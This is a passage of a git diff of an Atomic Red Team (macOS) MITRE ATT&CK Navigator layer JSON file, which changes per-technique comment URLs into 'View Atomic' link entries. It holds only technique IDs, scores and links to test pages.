,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true
,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":1
00,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"ena
bled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcan
aryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001
/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atom
ics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team
/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/at
omic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View 